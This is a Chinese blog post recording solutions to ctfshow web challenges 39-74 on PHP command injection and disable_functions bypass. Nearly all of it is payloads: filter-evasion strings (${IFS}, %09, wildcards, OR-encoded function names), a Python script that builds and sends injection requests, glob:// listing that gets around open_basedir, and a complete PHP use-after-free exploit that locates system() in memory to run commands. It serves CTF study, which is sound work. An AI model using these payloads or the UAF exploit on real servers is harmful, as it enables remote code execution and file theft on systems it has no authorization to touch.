ctfshow web39-74学习记录

最新推荐文章于 2024-05-06 11:25:30 发布
最新推荐文章于 2024-05-06 11:25:30 发布
阅读量425 收藏
点赞数
分类专栏: ctfshow 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/akxnxbshai/article/details/122516873
版权

目录

web 39

web 40

web 41

web 42

web 43

web 44

web 45

web 46

web 47-49

web 50-51

web 52

web 53

web 54

web 55-56

web 57

web 58

web 59

web 60

web 61-65

web 66

web 67

​ web 68-70

web 71

web 72

web 73

web 74

最终结果:

web 39

查看代码

还是利用php:data伪协议,和38差不多

Payload:?c=data://text/plain,<?php system('tac fla*.php');?>

web 40

直接给

Payload1:?c=show_source(next(array_reverse(scandir(current(localeconv())))));

通过货币信息(localeconv())取这个点(current())来到当前目录(scandir())把目录结果进行翻转(array_reverse())取向下一个,然后展示源码(show_source)

Payload2:

首先?c=print_r(get_defined_vars());

加POST数组(在POST中应加;1=phpinfo();)

利用对数组的操作next()

?c=print_r(next(get_defined_vars()));

获取数组值,对数组进行弹出array_pop()

?c=print_r(array_pop(next(get_defined_vars())));

执行一下eval(),改为1=system(‘ls’);

?c=eval(array_pop(next(get_defined_vars())));

再改为1=system(‘tac flag.php’);

web 41

这个给个链接:

ctfshow web入门 web41_羽的博客-CSDN博客https://blog.csdn.net/miuzzx/article/details/108569080

再给个脚本:

​

import re
import requests

url=http://0d86a44b-b5b8-412f-acac-c6f39a87cf19.challenge.ctf.show/#改成自己的链接

a=[]
ans1=""
ans2=""
for i in range(0,256):
    c=chr(i)
    tmp = re.match(r'[0-9]|[a-z]|\^|\+|\~|\$|\[|\]|\{|\}|\&|\-',c, re.I)
    if(tmp):
        continue
        #print(tmp.group(0))
    else:
        a.append(i)

mya="system"  #函数名 这里修改!
myb="ls"      #参数
def myfun(k,my):
    global ans1
    global ans2
    for i in range (0,len(a)):
        for j in range(i,len(a)):
            if(a[i]|a[j]==ord(my[k])):
                ans1+=chr(a[i])
                ans2+=chr(a[j])
                return;
for k in range(0,len(mya)):
    myfun(k,mya)
data1="(\""+ans1+"\"|\""+ans2+"\")"
ans1=""
ans2=""
for k in range(0,len(myb)):
    myfun(k,myb)
data2="(\""+ans1+"\"|\""+ans2+"\")"

data={"c":data1+data2}
r=requests.post(url=url,data=data)
print(r.text)
​

运行脚本

在修改一下(ls改为cat flag.php)

得到flag。

web 42

采用双写绕过(直接cat flag.php也可以)

改一下

web 43

查看后发现分号和cat被过滤了,于是想到可以将分号改为%0a

web 44

多了一个flag过滤,利用通配符,拿到flag

web 45

空格也被过滤,用%09替代

Payload:?c=tac%09fla*%0A

web 46

增加数字,$与*

Payload:?c=tac%09fla?????%0A

web 47-49

统一的payload:?c=tac%09fla?????%0A

web 50-51

Payload:?c=nl<fla''g.php||

web 52

首先ls一下payload:c=ls${IFS}/||

再cat一下flag,payload:?c=nl${IFS}/fla\g||

web 53

后边有了分号,不需要||了,cat,tac被过滤。

Payload:?c=nl${IFS}fla\g.php

web 54

直接ls一下

然后payload:?c=paste${IFS}fla?.php

web 55-56

发现字母全被过滤了,然后在网上学习了无字母命令执行,wp有点长,单独写一篇.

web 57

看到flag再flag36.php中,只要构造出来36即可

${_} ="" //返回上一次命令

$((${_}))=0

$((~$((${_}))))=-1

echo $(()) #0
echo $((~$(()))) #~0是-1
$(($((~$(())))$((~$(()))))) #$((-1-1))即$$((-2))是-2
echo $((~-37)) #~-37是36所以

payload:

$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))

web 58

Payload:c=show_source('flag.php');

POST直接传参 c=show_source('flag.php');

绕过disable_functions系列:

查看目录下文件:

c=var_dump(scandir("/"));

c=print_r(scandir('./'));

c=print_r(scandir(dirname('__FILE__')));

通过单一函数读取文件:

c=echo file_get_contents("flag.php");
c=readfile("flag.php");
c=var_dump(file('flag.php'));
c=print_r(file('flag.php'));(file — 把整个文件读入一个数组中)

通过fopen去读取文件内容,这里介绍下函数

fread()、ets()、getc()、getss()、getcsv()、passthru()

payload:

c=$a=fopen("flag.php","r");while (!feof($a)) {$line =fgets($a);echo $line;}//一行一行读取

c=$a=fopen("flag.php","r");while (!feof($a)) {$line = fgetc($a);echo $line;}//一个一个字符读取

c=$a=fopen("flag.php","r");while (!feof($a)) {$line =fgetcsv($a);var_dump($line);}

通过高亮显示php文件:

show_source("flag.php");            

highlight_file("flag.php"); 

web 59

查看当前目录下

然后高亮显示flag.php文件

web 60

Payload:c=show_source(‘flag.php’);或者c=highlight_file("flag.php");

c=$a=fopen("flag.php","r");while (!feof($a)) {$line = fgetc($a);echo $line;}

c=$a=fopen("flag.php","r");while (!feof($a)) {$line = fgetcsv($a);print_r($line);}

web 61-65

查看当前目录:c=print_r(scandir(current(localeconv())));

payload:

c=show_source('flag.php');

c=highlight_file('flag.php');

c=highlight_file(next(array_reverse(scandir(current(localeconv())))));

web 66

本来还想查看当先目录文件,但发现

然后查看根目录下文件

看到flag.txt,show_source()函数被禁用,于是用highlight_file()函数

Payload总结:c=print_r(scandir("/"));

c=highlight_file('/flag.txt');

web 67

发现print_r函数被禁用

先查看根目录下文件:c=var_dump(scandir("/"));

然后POST:c=highlight_file('/flag.txt');

web 68-70

hint:尝试include('index.php');
发现字节太大了 直接盲猜 c=include('/flag.txt')

show_source()和highlight_file()被禁用

先查看根目录下问价

看到flag在flag.txt中

payload:c=include('/flag.txt')

69和70也可以用:c=include('/flag.txt')

web 71

Hint:我们可以执行php代码让后面的匹配缓冲区不执行直接退出 payload:c=include('/flag.txt');exit(0);

函数介绍:

ob_get_contents — 返回输出缓冲区的内容
ob_end_clean — 清空(擦除)缓冲区并关闭输出缓冲

payload:

c=require_once('/flag.txt');exit();这里通过exit();使程序提前退出,绕过后面的正则表达式

web 72

Payload:

c=?%3E%3C?php%20%0A%20%20%20%20$a=new%20directoryiterator(%22glob:///*%22);%20%0Aforeach($a%20as%20$f)%20%7B%0A%20%20%20%20echo($f-%3E__tostring().'%20');%20%0A%7D%20%0Aexit(0);%0A?%3E

然后就需要用到uaf脚本绕过,disable_function()限制了很多函数,可以直接用uaf脚本进行命令执行

c=function ctfshow($cmd) {
    global $abc, $helper, $backtrace;

    class Vuln {
        public $a;
        public function __destruct() { 
            global $backtrace; 
            unset($this->a);
            $backtrace = (new Exception)->getTrace();
            if(!isset($backtrace[1]['args'])) {
                $backtrace = debug_backtrace();
            }
        }
    }

    class Helper {
        public $a, $b, $c, $d;
    }

    function str2ptr(&$str, $p = 0, $s = 8) {
        $address = 0;
        for($j = $s-1; $j >= 0; $j--) {
            $address <<= 8;
            $address |= ord($str[$p+$j]);
        }
        return $address;
    }

    function ptr2str($ptr, $m = 8) {
        $out = "";
        for ($i=0; $i < $m; $i++) {
            $out .= sprintf("%c",($ptr & 0xff));
            $ptr >>= 8;
        }
        return $out;
    }

    function write(&$str, $p, $v, $n = 8) {
        $i = 0;
        for($i = 0; $i < $n; $i++) {
            $str[$p + $i] = sprintf("%c",($v & 0xff));
            $v >>= 8;
        }
    }

    function leak($addr, $p = 0, $s = 8) {
        global $abc, $helper;
        write($abc, 0x68, $addr + $p - 0x10);
        $leak = strlen($helper->a);
        if($s != 8) { $leak %= 2 << ($s * 8) - 1; }
        return $leak;
    }

    function parse_elf($base) {
        $e_type = leak($base, 0x10, 2);

        $e_phoff = leak($base, 0x20);
        $e_phentsize = leak($base, 0x36, 2);
        $e_phnum = leak($base, 0x38, 2);

        for($i = 0; $i < $e_phnum; $i++) {
            $header = $base + $e_phoff + $i * $e_phentsize;
            $p_type  = leak($header, 0, 4);
            $p_flags = leak($header, 4, 4);
            $p_vaddr = leak($header, 0x10);
            $p_memsz = leak($header, 0x28);

            if($p_type == 1 && $p_flags == 6) { 

                $data_addr = $e_type == 2 ? $p_vaddr : $base + $p_vaddr;
                $data_size = $p_memsz;
            } else if($p_type == 1 && $p_flags == 5) { 
                $text_size = $p_memsz;
            }
        }

        if(!$data_addr || !$text_size || !$data_size)
            return false;

        return [$data_addr, $text_size, $data_size];
    }

    function get_basic_funcs($base, $elf) {
        list($data_addr, $text_size, $data_size) = $elf;
        for($i = 0; $i < $data_size / 8; $i++) {
            $leak = leak($data_addr, $i * 8);
            if($leak - $base > 0 && $leak - $base < $data_addr - $base) {
                $deref = leak($leak);
                
                if($deref != 0x746e6174736e6f63)
                    continue;
            } else continue;

            $leak = leak($data_addr, ($i + 4) * 8);
            if($leak - $base > 0 && $leak - $base < $data_addr - $base) {
                $deref = leak($leak);
                
                if($deref != 0x786568326e6962)
                    continue;
            } else continue;

            return $data_addr + $i * 8;
        }
    }

    function get_binary_base($binary_leak) {
        $base = 0;
        $start = $binary_leak & 0xfffffffffffff000;
        for($i = 0; $i < 0x1000; $i++) {
            $addr = $start - 0x1000 * $i;
            $leak = leak($addr, 0, 7);
            if($leak == 0x10102464c457f) {
                return $addr;
            }
        }
    }

    function get_system($basic_funcs) {
        $addr = $basic_funcs;
        do {
            $f_entry = leak($addr);
            $f_name = leak($f_entry, 0, 6);

            if($f_name == 0x6d6574737973) {
                return leak($addr + 8);
            }
            $addr += 0x20;
        } while($f_entry != 0);
        return false;
    }

    function trigger_uaf($arg) {

        $arg = str_shuffle('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA');
        $vuln = new Vuln();
        $vuln->a = $arg;
    }

    if(stristr(PHP_OS, 'WIN')) {
        die('This PoC is for *nix systems only.');
    }

    $n_alloc = 10; 
    $contiguous = [];
    for($i = 0; $i < $n_alloc; $i++)
        $contiguous[] = str_shuffle('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA');

    trigger_uaf('x');
    $abc = $backtrace[1]['args'][0];

    $helper = new Helper;
    $helper->b = function ($x) { };

    if(strlen($abc) == 79 || strlen($abc) == 0) {
        die("UAF failed");
    }

    $closure_handlers = str2ptr($abc, 0);
    $php_heap = str2ptr($abc, 0x58);
    $abc_addr = $php_heap - 0xc8;

    write($abc, 0x60, 2);
    write($abc, 0x70, 6);

    write($abc, 0x10, $abc_addr + 0x60);
    write($abc, 0x18, 0xa);

    $closure_obj = str2ptr($abc, 0x20);

    $binary_leak = leak($closure_handlers, 8);
    if(!($base = get_binary_base($binary_leak))) {
        die("Couldn't determine binary base address");
    }

    if(!($elf = parse_elf($base))) {
        die("Couldn't parse ELF header");
    }

    if(!($basic_funcs = get_basic_funcs($base, $elf))) {
        die("Couldn't get basic_functions address");
    }

    if(!($zif_system = get_system($basic_funcs))) {
        die("Couldn't get zif_system address");
    }


    $fake_obj_offset = 0xd0;
    for($i = 0; $i < 0x110; $i += 8) {
        write($abc, $fake_obj_offset + $i, leak($closure_obj, $i));
    }

    write($abc, 0x20, $abc_addr + $fake_obj_offset);
    write($abc, 0xd0 + 0x38, 1, 4); 
    write($abc, 0xd0 + 0x68, $zif_system); 

    ($helper->b)($cmd);
    exit();
}

ctfshow("cat /flag0.txt");ob_end_flush();
#需要通过url编码哦
拿到flag。

web 73

根据上一题的经验,直接用glob伪协议。

payload:

c=?><?php

    $a=new directoryiterator("glob:///*");

foreach($a as $f) {

    echo($f->__tostring().' ');

}

exit(0);

?>

#   glob:///*  会列出根目录下的文件

# glob://*   会列出open_basedir允许目录下的文件

需要对其进行一次url编码

得到flagc.txt,再得到flag:

c=include('/flagc.txt');exit(0);

c=require("/flagc.txt");exit(0);

c=require_once("/flagc.txt");exit(0);

web 74

和上一题过程一样。

最终结果:

f0njl
关注
专栏目录
CTFshow 命令执行 web74
Kradress的博客
12-06 238
目录源码思路题解总结 源码 Warning: error_reporting() has been disabled for security reasons in /var/www/html/index.php on line 14 Warning: ini_set() has been disabled for security reasons in /var/www/html/index.php on line 15 Warning: highlight_file() has been disa
2024年网安最全ctfshow-WEB-web3_ctfshow web3(1)
2401_84264583的博客
05-01 508
php://input 可以访问请求的原始数据,配合文件包含漏洞可以将post请求体中的内容当做文件内容执行,enctype=multipart/form-data"时,php:/input将会无效。ctf.show WEB模块的第3关是一个文件包含漏洞,include()函数包含的文件会被执行,我们使用PHP伪协议配合抓包工具进行命令执行,从而获取flag。很明显这个crf_go_go_go文件就是存放flag的文件。这一关的flag就存放在网站跟路径下的文件中。
ctfshow-命令执行-web39
weixin_43400535的博客
11-03 995
ctfshow-web39 文章目录ctfshow-web39题目描述:原理:审计:方法:思路:同样使用web38的方法,使用data为协议Flag: 题目描述: 原理: 审计: <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-04 00:12:34 # @Last Modified by: h1xa # @Last Modified time: 2020-09-04 06:13:21 # @email
ctfshow-web39(命令执行)
m0_62094846的博客
01-22 407
<?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-04 00:12:34 # @Last Modified by: h1xa # @Last Modified time: 2020-09-04 06:13:21 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ //flag in flag.php error_reporting(0); if(i..
Ctfshow web入门-web39 WP
qq_45427131的博客
05-18 233
这题的解题方法和web38是一样的,详情参考我之前的的write up 传送门:点击传送i 这里只放解题步骤,详细的参考web38
ctfshow-web入门72-74
m0_73303597的博客
01-09 581
自用
2024年最新ctfshow-WEB-web9( MD5加密漏洞绕过)_ctfshow web9(1),网络安全架构师必备框架技能核心笔记
最新发布
2401_84301227的博客
05-06 726
当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。
2024年网安最全ctfshow-WEB-web3_ctfshow web3
2401_84264610的博客
05-01 26
php://input 可以访问请求的原始数据,配合文件包含漏洞可以将post请求体中的内容当做文件内容执行,enctype=multipart/form-data"时,php:/input将会无效。页面中显示了部分源码,明显是引导我们利用文件包含漏洞进行操作,源码中的include()函数通过GET请求接收一个url参数,那接下来我们就给它传递一个url参数。我们直接在url地址栏中拼接url参数,访问crf_go_go_go文件。很明显这个crf_go_go_go文件就是存放flag的文件。
ctfshow web入门 命令执行web29-web57详解
2401_84009597的博客
04-12 680
当print_r(scandir(pos(localeconv())));时,会返回当前目录,pos(localeconv())的值为"."将数组用array_reverse进行倒转,并用next将指针指向flag.php最后进行读取,列出两个整理起来就是。
CTFSHOW web入门 web37-web39
m0_53194713的博客
07-08 332
/?c=data://text/plain, 过滤了php所以上面那个不能用了,可以这样写?c=data://text/plain,这里是使用短标签=来代替php或者使用base64编码一下?c=data://text/plain;base64,PD89IHN5c3RlbSgidGFjIGZsYSoucCpwIik7Pz4= 可以发现这里给传入的c加了个后缀,借用直接给的hint来说data://...
CTFshow 命令执行 web39
Kradress的博客
10-30 138
源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-04 00:12:34 # @Last Modified by: h1xa # @Last Modified time: 2020-09-04 06:13:21 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ //flag in flag.php error_reporting(0); if(
ctfshow学习记录-web入门(命令执行39-48)
龟速更新的九某人
06-06 846
ctfshow学习记录-web入门(命令执行web39-48)
ctfshow web入门 命令运行 web39---web52
2301_81040377的博客
04-02 790
昨天看了一下我的博客真的很恼火,不好看,还是用md来写吧。
ctfshow web入门 命令执行39-43
m0_62207170的博客
03-31 405
ctfshow web入门 命令执行39-43
ctfshow命令执行(持续更新,已更至web39)
qq_55233040的博客
08-17 833
做命令执行题比前两种慢很多,到现在也只做了总数的五分之一,慢慢来吧。 web29web30web31 web29 题目如下: error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } 先GET一个参数c,如果c中没有’flag’字
有了这个网络安全面试题,面试就像开了挂!(附PDF)
lvaolan的博客
02-26 901
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!​​​​内容实在太多,不一一截图了。
[ctfshow]web入门——命令执行(web72-web77)
ShenZ的博客
12-02 2441
ctfshow的命令执行(web72-77)
ctfshow web入门命令执行web74-118
m0_62207170的博客
04-12 347
ctfshow web入门命令执行web74-118
《CTFshow-Web入门》08. Web 71~80
学习学习学习......
05-05 2075
eval() 利用,ob_end_clean() 绕过,正则绕过、PHP 垃圾回收机制,伪协议 {glob://}、PDO 利用、FFI 利用、include() 利用、伪协议 {php://},{data://}、一句话木马之 Nginx 日志利用。
ctfshow-web-web红包题
07-14
ctfshow-web-web红包题是一道CTF比赛中的网络安全题目。这道题目的背景是一个在线购物网站,要求我们通过安全漏洞来获得网站的红包。 首先,我们可以检查网站的源代码,寻找可能存在的漏洞。在网站的前端页面中,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

f0njl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值